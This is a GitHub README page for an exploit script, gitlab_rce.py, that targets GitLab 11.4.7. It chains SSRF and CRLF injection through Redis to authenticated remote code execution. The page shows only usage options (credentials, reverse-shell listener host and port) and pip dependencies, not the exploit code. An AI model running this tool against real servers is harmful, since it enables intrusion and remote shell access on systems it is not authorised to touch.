Skip to content

Latest commit

 

History

History
27 lines (16 loc) · 719 Bytes

File metadata and controls

27 lines (16 loc) · 719 Bytes

GitLab-11.4.7-Authenticated-Remote-Code-Execution

(SSRF + CRLF -> Redis -> RCE)

Usage : python3 gitlab_rce.py -U `USERNAME` -P `PASSWORD` -l `LHOST` -p `LPORT`

usage: gitlab_rce.py [-h] [-U U] [-P P] [-l L] [-p P]

GitLab 11.4.7 Authenticated RCE

optional arguments:

-h, --help show this help message and exit

-U GitLab Username

-P Gitlab Password

-l rev shell lhost

-p rev shell lport

Dependencies

pip3 install RandomWords==0.3.0

pip3 install bs4

pip3 install requests